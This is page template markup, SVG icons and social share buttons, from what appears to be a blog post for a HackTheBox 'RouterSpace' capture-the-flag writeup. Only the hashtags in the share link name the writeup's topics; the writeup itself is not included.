    <symbol id="icon-linkedin" viewBox="0 0 12 14"><path class="path1" d="M1.852 11.047h1.805v-5.422h-1.805v5.422zM3.773 3.953q-0.008-0.406-0.281-0.672t-0.727-0.266-0.738 0.266-0.285 0.672q0 0.398 0.277 0.668t0.723 0.27h0.008q0.461 0 0.742-0.27t0.281-0.668zM8.344 11.047h1.805v-3.109q0-1.203-0.57-1.82t-1.508-0.617q-1.062 0-1.633 0.914h0.016v-0.789h-1.805q0.023 0.516 0 5.422h1.805v-3.031q0-0.297 0.055-0.438 0.117-0.273 0.352-0.465t0.578-0.191q0.906 0 0.906 1.227v2.898zM12 3.25v7.5q0 0.93-0.66 1.59t-1.59 0.66h-7.5q-0.93 0-1.59-0.66t-0.66-1.59v-7.5q0-0.93 0.66-1.59t1.59-0.66h7.5q0.93 0 1.59 0.66t0.66 1.59z"></path></symbol>
    <symbol id="icon-instagram" viewBox="0 0 438.536 438.536"><path class="path1" d="M421.981,16.562C410.941,5.519,397.711,0,382.298,0H56.248C40.83,0,27.604,5.521,16.561,16.562
		C5.52,27.6,0.001,40.828,0.001,56.243V382.29c0,15.413,5.518,28.644,16.56,39.683c11.043,11.04,24.272,16.563,39.687,16.563
		h326.046c15.41,0,28.644-5.523,39.684-16.563c11.043-11.039,16.557-24.27,16.557-39.683V56.243
		C438.534,40.825,433.021,27.604,421.981,16.562z M157.462,158.025c17.224-16.652,37.924-24.982,62.097-24.982
		c24.36,0,45.153,8.33,62.381,24.982c17.228,16.655,25.837,36.785,25.837,60.386c0,23.598-8.609,43.729-25.837,60.379
		c-17.228,16.659-38.014,24.988-62.381,24.988c-24.172,0-44.87-8.336-62.097-24.988c-17.228-16.652-25.841-36.781-25.841-60.379
		C131.621,194.81,140.234,174.681,157.462,158.025z M388.865,370.589c0,4.945-1.718,9.083-5.141,12.416
		c-3.433,3.33-7.519,4.996-12.282,4.996h-305.2c-4.948,0-9.091-1.666-12.419-4.996c-3.333-3.326-4.998-7.471-4.998-12.416V185.575
		H89.08c-3.805,11.993-5.708,24.462-5.708,37.402c0,36.553,13.322,67.715,39.969,93.511c26.65,25.786,58.721,38.685,96.217,38.685
		c24.744,0,47.583-5.903,68.527-17.703c20.937-11.807,37.486-27.839,49.676-48.112c12.183-20.272,18.274-42.4,18.274-66.38
		c0-12.94-1.91-25.406-5.715-37.402h38.547v185.014H388.865z M388.865,115.626c0,5.52-1.903,10.184-5.716,13.99
		c-3.805,3.809-8.466,5.711-13.989,5.711h-49.676c-5.517,0-10.185-1.903-13.99-5.711c-3.806-3.806-5.708-8.47-5.708-13.99V68.522
		c0-5.33,1.902-9.945,5.708-13.848c3.806-3.901,8.474-5.854,13.99-5.854h49.676c5.523,0,10.185,1.952,13.989,5.854
		c3.812,3.903,5.716,8.518,5.716,13.848V115.626z" /></symbol>
    <symbol id="icon-telegram" viewBox="0 0 80 80">
    <path d="M 70.511719 10.986328 C 69.833089 11.015588 69.157051 11.196735 68.537109 11.4375 L 68.535156 11.4375 C 67.931048 11.673297 64.049934 13.281226 58.392578 15.628906 C 52.735222 17.976586 45.3821 21.032905 38.091797 24.064453 C 23.51119 30.12755 9.1835937 36.091797 9.1835938 36.091797 L 9.2480469 36.068359 C 9.2480469 36.068359 8.4485192 36.330303 7.6484375 36.871094 C 7.2483967 37.141489 6.8283994 37.486951 6.4960938 37.966797 C 6.163788 38.446643 5.9299055 39.103809 6.0195312 39.808594 C 6.1812736 41.080477 7.0482024 41.912426 7.7636719 42.412109 C 8.4791414 42.911793 9.1660156 43.148437 9.1660156 43.148438 L 9.1738281 43.152344 L 23.1875 47.785156 C 23.418097 48.587707 27.163839 61.631062 28.046875 64.384766 C 28.50876 65.826709 28.935922 66.627156 29.335938 67.130859 C 29.535944 67.382711 29.733459 67.561543 29.931641 67.683594 C 30.016841 67.736064 30.101273 67.771554 30.183594 67.802734 C 30.197014 67.807834 30.211349 67.817736 30.224609 67.822266 C 30.252855 67.83191 30.267938 67.831811 30.302734 67.839844 C 31.62302 68.328201 32.738281 67.476563 32.738281 67.476562 L 32.769531 67.453125 L 42.376953 59 L 56.585938 70.394531 L 56.710938 70.449219 C 58.991132 71.431474 60.875783 70.891854 61.970703 70.027344 C 63.065623 69.162833 63.509766 68.03125 63.509766 68.03125 L 63.544922 67.943359 L 73.794922 16.097656 C 74.046117 14.98858 74.071392 14.057617 73.853516 13.257812 C 73.635643 12.458006 73.128863 11.807693 72.5 11.443359 C 71.871137 11.079025 71.190348 10.957066 70.511719 10.986328 z M 70.566406 13.021484 C 70.96444 13.004357 71.29991 13.059037 71.498047 13.173828 C 71.696183 13.288619 71.824951 13.420226 71.923828 13.783203 C 72.022708 14.14618 72.046557 14.758873 71.84375 15.654297 L 71.839844 15.667969 L 61.630859 67.3125 C 61.615849 67.34707 61.352842 67.965627 60.730469 68.457031 C 60.102941 68.952505 59.248838 69.318622 57.578125 68.626953 L 34.738281 50.310547 A 1.0001 1.0001 0 0 0 34 50 A 1.0001 1.0001 0 0 0 32.988281 50.974609 L 30.384766 64.923828 C 30.251656 64.61729 30.108215 64.257609 29.953125 63.773438 C 29.147161 61.260079 25.522903 48.675314 25.166016 47.435547 L 61.013672 24.226562 A 1.0001 1.0001 0 0 0 62 25 A 1.0001 1.0001 0 0 0 62.988281 23.783203 C 63.014848 23.477186 62.989225 23.17624 62.855469 22.876953 C 62.639651 22.394056 62.128723 22.100054 61.765625 22.03125 C 61.039429 21.893642 60.566406 22.158203 60.566406 22.158203 L 60.466797 22.195312 L 23.857422 45.900391 L 9.8261719 41.261719 L 9.8222656 41.259766 C 9.8185507 41.25848 9.3777555 41.099419 8.9082031 40.771484 C 8.4366726 40.442168 8.062164 40.014757 8.0039062 39.556641 C 7.9835322 39.396426 8.0143062 39.287873 8.140625 39.105469 C 8.2669443 38.923065 8.501119 38.707449 8.7675781 38.527344 C 9.3004964 38.167134 9.8886719 37.962891 9.8886719 37.962891 L 9.9199219 37.951172 L 9.953125 37.9375 C 9.953125 37.9375 24.279232 31.97306 38.859375 25.910156 C 46.149446 22.878704 53.503668 19.823883 59.160156 17.476562 C 64.816644 15.129243 68.856374 13.458984 69.261719 13.300781 C 69.707777 13.127547 70.168373 13.038612 70.566406 13.021484 z M 59.199219 25.699219 L 58.398438 26.101562 L 58.240234 26.984375 L 58.853516 27.638672 L 59.199219 27.699219 L 60 27.298828 L 60.158203 26.416016 L 59.546875 25.761719 L 59.199219 25.699219 z M 56.400391 28.400391 L 55.599609 28.800781 L 55.441406 29.683594 L 56.052734 30.337891 L 56.400391 30.400391 L 57.201172 29.998047 L 57.359375 29.117188 L 56.746094 28.462891 L 56.400391 28.400391 z M 53.599609 31.099609 L 52.798828 31.501953 L 52.640625 32.382812 L 53.251953 33.037109 L 53.599609 33.099609 L 54.400391 32.699219 L 54.558594 31.816406 L 53.947266 31.162109 L 53.599609 31.099609 z M 50.800781 33.800781 L 49.998047 34.201172 L 49.841797 35.083984 L 50.453125 35.738281 L 50.800781 35.800781 L 51.601562 35.398438 L 51.759766 34.517578 L 51.146484 33.861328 L 50.800781 33.800781 z M 48 36.5 L 47.199219 36.902344 L 47.041016 37.783203 L 47.652344 38.4375 L 48 38.5 L 48.800781 38.099609 L 48.958984 37.216797 L 48.347656 36.5625 L 48 36.5 z M 45.199219 39.199219 L 44.398438 39.601562 L 44.240234 40.484375 L 44.853516 41.138672 L 45.199219 41.199219 L 46.001953 40.798828 L 46.158203 39.916016 L 45.546875 39.261719 L 45.199219 39.199219 z M 42.400391 41.900391 L 41.599609 42.300781 L 41.441406 43.183594 L 42.052734 43.837891 L 42.400391 43.900391 L 43.201172 43.498047 L 43.359375 42.617188 L 42.746094 41.962891 L 42.400391 41.900391 z M 39.599609 44.599609 L 38.798828 45.001953 L 38.640625 45.882812 L 39.253906 46.537109 L 39.599609 46.599609 L 40.400391 46.199219 L 40.558594 45.316406 L 39.947266 44.662109 L 39.599609 44.599609 z M 36.800781 47.300781 L 35.998047 47.701172 L 35.841797 48.583984 L 36.453125 49.238281 L 36.800781 49.300781 L 37.601562 48.898438 L 37.759766 48.015625 L 37.146484 47.361328 L 36.800781 47.300781 z M 34.675781 52.824219 L 40.794922 57.730469 L 32.378906 65.132812 L 34.675781 52.824219 z" />
     </symbol>
     <symbol id="icon-youtube" viewBox="0 0 24 24">
       <path d="M4.652 0h1.44l.988 3.702.916-3.702h1.454l-1.665 5.505v3.757h-1.431v-3.757l-1.702-5.505zm6.594 2.373c-1.119 0-1.861.74-1.861 1.835v3.349c0 1.204.629 1.831 1.861 1.831 1.022 0 1.826-.683 1.826-1.831v-3.349c0-1.069-.797-1.835-1.826-1.835zm.531 5.127c0 .372-.19.646-.532.646-.351 0-.554-.287-.554-.646v-3.179c0-.374.172-.651.529-.651.39 0 .557.269.557.651v3.179zm4.729-5.07v5.186c-.155.194-.5.512-.747.512-.271 0-.338-.186-.338-.46v-5.238h-1.27v5.71c0 .675.206 1.22.887 1.22.384 0 .918-.2 1.468-.853v.754h1.27v-6.831h-1.27zm2.203 13.858c-.448 0-.541.315-.541.763v.659h1.069v-.66c.001-.44-.092-.762-.528-.762zm-4.703.04c-.084.043-.167.109-.25.198v4.055c.099.106.194.182.287.229.197.1.485.107.619-.067.07-.092.105-.241.105-.449v-3.359c0-.22-.043-.386-.129-.5-.147-.193-.42-.214-.632-.107zm4.827-5.195c-2.604-.177-11.066-.177-13.666 0-2.814.192-3.146 1.892-3.167 6.367.021 4.467.35 6.175 3.167 6.367 2.6.177 11.062.177 13.666 0 2.814-.192 3.146-1.893 3.167-6.367-.021-4.467-.35-6.175-3.167-6.367zm-12.324 10.686h-1.363v-7.54h-1.41v-1.28h4.182v1.28h-1.41v7.54zm4.846 0h-1.21v-.718c-.223.265-.455.467-.696.605-.652.374-1.547.365-1.547-.955v-5.438h1.209v4.988c0 .262.063.438.322.438.236 0 .564-.303.711-.487v-4.939h1.21v6.506zm4.657-1.348c0 .805-.301 1.431-1.106 1.431-.443 0-.812-.162-1.149-.583v.5h-1.221v-8.82h1.221v2.84c.273-.333.644-.608 1.076-.608.886 0 1.18.749 1.18 1.631v3.609zm4.471-1.752h-2.314v1.228c0 .488.042.91.528.91.511 0 .541-.344.541-.91v-.452h1.245v.489c0 1.253-.538 2.013-1.813 2.013-1.155 0-1.746-.842-1.746-2.013v-2.921c0-1.129.746-1.914 1.837-1.914 1.161 0 1.721.738 1.721 1.914v1.656z" />
    </symbol>
    <symbol id="icon-gitlab" viewBox="-5 -15 220 200">
      <path d="M105.0614,193.655 L105.0614,193.655 L143.7014,74.734 L66.4214,74.734 L105.0614,193.655 L105.0614,193.655 Z" />
      <path d="M105.0614,193.6548 L66.4214,74.7338 L12.2684,74.7338 L105.0614,193.6548 Z" />
      <path d="M12.2685,74.7341 L12.2685,74.7341 L0.5265,110.8731 C-0.5445,114.1691 0.6285,117.7801 3.4325,119.8171 L105.0615,193.6551 L12.2685,74.7341 Z" />
      &lt;path d="M12.2685,74.7342 L66.4215,74.7342 L43.1485,3.1092 C41.9515,-0.5768 36.7375,-0.5758 35.5405,3.1092 L12.2685,74.7342 Z" "/&gt;
      <path d="M105.0614,193.6548 L143.7014,74.7338 L197.8544,74.7338 L105.0614,193.6548 Z" />
      <path d="M197.8544,74.7341 L197.8544,74.7341 L209.5964,110.8731 C210.6674,114.1691 209.4944,117.7801 206.6904,119.8171 L105.0614,193.6551 L197.8544,74.7341 Z" />
      <path d="M197.8544,74.7342 L143.7014,74.7342 L166.9744,3.1092 C168.1714,-0.5768 173.3854,-0.5758 174.5824,3.1092 L197.8544,74.7342 Z" />
    </symbol>
</defs></svg>

<p><br /></p>
<section class="share">

    <h2>Share</h2>

    <a aria-label="Share on Twitter" href="https://twitter.com/intent/tweet?text=HackTheBox &quot;RouterSpace&quot; wirteup is now available!%20http://localhost:4000/writeups/HackTheBox/2022-07-09-RouterSpace/%20via%20&#64;0xbro1&amp;hashtags=Android,,Baron,Samedit,,CVE-2021-3156,,Linux,,RCE,,command-injection,,sudo-privesc," onclick="window.open(this.href, 'twitter-share', 'width=550,height=235');return false;" title="Share on Twitter">
        <svg class="icon icon-twitter"><use xlink:href="#icon-twitter"></use></svg>
    </a>

    <a aria-label="Share on Facebook" href="https://www.facebook.com/sharer/sharer.php?u=http://localhost:4000/writeups/HackTheBox/2022-07-09-RouterSpace/" onclick="window.open(this.href, 'facebook-share','width=580,height=296');return false;" title="Share on Facebook">
        <svg class="icon icon-facebook"><use xlink:href="#icon-facebook"></use></svg>
    </a>

    <a aria-label="Share on Linkedin" href="https://www.linkedin.com/shareArticle?mini=true&amp;url=http://localhost:4000/writeups/HackTheBox/2022-07-09-RouterSpace/&amp;title=RouterSpace&amp;summary=&amp;source=
    " onclick="window.open(this.href, 'linkedin-share','width=580,height=296');return false;" title="Share on Linkedin">
        <svg class="icon icon-linkedin"><use xlink:href="#icon-linkedin"></use></svg>
    </a>

</section>
:ET